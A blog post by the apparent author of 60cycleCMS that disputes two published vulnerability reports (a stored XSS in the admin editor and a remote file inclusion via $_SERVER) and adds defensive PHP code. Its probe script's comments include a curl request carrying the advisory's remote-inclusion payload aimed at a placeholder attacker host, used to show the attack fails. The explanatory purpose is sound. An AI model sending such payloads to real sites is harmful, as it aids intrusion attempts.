
David van Geest

Software, Life, and Stuff I Couldn't Find on the Internet

Supposed security vulnerabilities in 60cycleCMS


Googling 60cycleCMS these days brings up a few "security vulnerabilities" that, at first glance, look alarming. The first alleged vulnerability is generally described as an HTML injection, or persistent (stored) XSS (cross-site scripting), vulnerability. Here's a link to a report (these reports tend to multiply across the web, so other sites describe the same exploit).

I'm all for transparency and openness in coding, and I'm glad people take time to expose vulnerabilities in others' code. However, this XSS "vulnerability" really needs to be put in context.

The XSS report states that an attacker can insert malicious HTML or JavaScript into an existing post through the "Edit" feature of 60cycleCMS because the user input is not validated. The unvalidated-input part is true, but it is intentional and, when the CMS is installed as intended, does not expose the website to attack. Let me elaborate.

First, the input is left unfiltered so that the website author can post any HTML content they want. When I write a post like this one, I don't want to fight my own HTML filters.

Second, the page in question (private/select.php?act=edit) is a private page. Had the report's author read the readme or actually installed the CMS, he would have noticed that the install process password-protects that area of the site with an .htaccess file. Therefore only the website author (presumably trusted) can post unfiltered HTML and/or JavaScript on the site; this is content written by an authenticated administrator, not injection by an anonymous visitor. If you were to remove the protection from the private admin section, then this exploit would be possible, but then of course an attacker could do anything they wanted, whether that is deleting your posts or changing your database configuration. Presumably my users are not stupid enough to leave themselves open this way.
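Since the whole argument rests on the .htaccess protection being in place, here is a small defense-in-depth guard a private page could run before rendering the unfiltered editor. It is an added example for this post, not code from 60cycleCMS, and it assumes Apache with mod_php and the Basic-auth .htaccess the installer writes: once Basic auth has succeeded, Apache exposes the authenticated name as REMOTE_USER (and mod_php also sets PHP_AUTH_USER), so if the protection has gone missing the guard fails closed instead of serving the editor to the world. The file name auth_guard.php is my own choice.

```php
<?php
// private/auth_guard.php (hypothetical file; not part of 60cycleCMS).
// Include it at the top of every page under private/:
//   require __DIR__ . '/auth_guard.php';

/**
 * Return the user name the web server authenticated, or null if this request
 * was never challenged. Apache sets REMOTE_USER after Basic auth succeeds and
 * mod_php additionally fills PHP_AUTH_USER. Under other SAPIs (php-fpm, CGI)
 * confirm that REMOTE_USER is actually passed through before relying on this.
 */
function authenticatedUser(array $server): ?string
{
    foreach (['REMOTE_USER', 'PHP_AUTH_USER'] as $key) {
        if (isset($server[$key]) && $server[$key] !== '') {
            return $server[$key];
        }
    }
    return null;
}

// Fail closed: nobody authenticated means the .htaccess is missing or is not
// being honoured (for example AllowOverride None), so the unfiltered editor
// must not be served. This does not replace the .htaccess; it only makes its
// absence loud instead of silent.
if (authenticatedUser($_SERVER) === null) {
    header('HTTP/1.1 403 Forbidden');
    header('Content-Type: text/plain');
    exit("private/ is not protected by the web server; restore private/.htaccess.\n");
}
```

A quick external check of the same property is to request private/select.php?act=edit without credentials and confirm the server answers 401 rather than rendering the editor.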

The second supposed vulnerability is a remote file inclusion (RFI). Here's a link. Originally posted on exploit-db.com, this exploit claimed that you could make the PHP powering the CMS include a remote file, and so execute arbitrary code on the web server. The "exploit" centered on overwriting the $_SERVER variable so that the CMS would load config.php from somewhere other than its usual location (one level above the website root). This vulnerability is simply false. PHP does not let a remote user override $_SERVER: request data lands in $_GET, $_POST and $_COOKIE, while $_SERVER is populated by the web server and PHP itself, so a query parameter named _SERVER[DOCUMENT_ROOT] just becomes $_GET['_SERVER']['DOCUMENT_ROOT'] and changes nothing the CMS reads. There's an email thread discussing this in more detail here. The exploit has been removed from Exploit-DB (I can only assume because it is incorrect), but a few sites around the web still have it up.
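If you want to see this for yourself rather than take my word for it, here is a probe script, added for this post and not part of 60cycleCMS, that feeds PHP the payload such advisories rely on and shows where it actually ends up. It also shows the way I would locate config.php one level above the web root, from __DIR__ rather than from anything request-derived, and prints the two ini settings that decide whether an include could ever reach over the network at all. The file name probe.php, the attacker.example host and the assumption that the script sits in the web root are mine.

```php
<?php
// probe.php (added example, not 60cycleCMS code). Serve it with the built-in server:
//   php -S 127.0.0.1:8080 probe.php
// and request the payload the advisory relied on:
//   curl 'http://127.0.0.1:8080/?_SERVER[DOCUMENT_ROOT]=http://attacker.example/'
// Run from the CLI instead, it simulates the same query string with parse_str().

header('Content-Type: text/plain');

// Constructed payload: the same string the advisory put in the query.
if (PHP_SAPI === 'cli') {
    parse_str('_SERVER[DOCUMENT_ROOT]=http://attacker.example/', $_GET);
}

// Where PHP really puts a parameter called _SERVER[...]: in $_GET as a nested
// array. The $_SERVER superglobal is untouched.
echo "GET['_SERVER']         : ", var_export($_GET['_SERVER'] ?? null, true), "\n";
echo "SERVER['DOCUMENT_ROOT']: ", var_export($_SERVER['DOCUMENT_ROOT'] ?? null, true), "\n";

/**
 * Resolve config.php one level above the web root without consulting request
 * data, or even DOCUMENT_ROOT: __DIR__ is fixed when the file is compiled.
 * Returns null unless the result is an existing local file.
 */
function configPath(string $webRoot): ?string
{
    $candidate = realpath(dirname($webRoot) . '/config.php');
    if ($candidate === false || !is_file($candidate)) {
        return null;
    }
    // realpath() never yields a URL, so no stream wrapper can sneak in here;
    // the check just makes the intent explicit for the next reader.
    if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $candidate)) {
        return null;
    }
    return $candidate;
}

// These two settings decide whether require 'http://...' could fetch code at all.
echo "allow_url_include      : ", var_export((bool) ini_get('allow_url_include'), true), "\n";
echo "allow_url_fopen        : ", var_export((bool) ini_get('allow_url_fopen'), true), "\n";
echo "config.php             : ", var_export(configPath(__DIR__), true), "\n";
```

Whatever the value of DOCUMENT_ROOT, the attacker's string only ever shows up on the first line. Confirming allow_url_include is off (and allow_url_fopen if nothing needs it) is still worth doing on any PHP host, and on very old installs it does no harm to confirm register_globals is off as well, but neither has anything to do with the claim in this advisory.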

The point is: don't believe everything you read on the web. It would seem there are people out there trying to make us think they're l33t hackers by exposing security vulnerabilities when, in reality, they don't do their homework and are sometimes just plain wrong. If you do have any concerns about the security of 60cycleCMS, please contact me or leave a comment, and I will be happy to discuss them.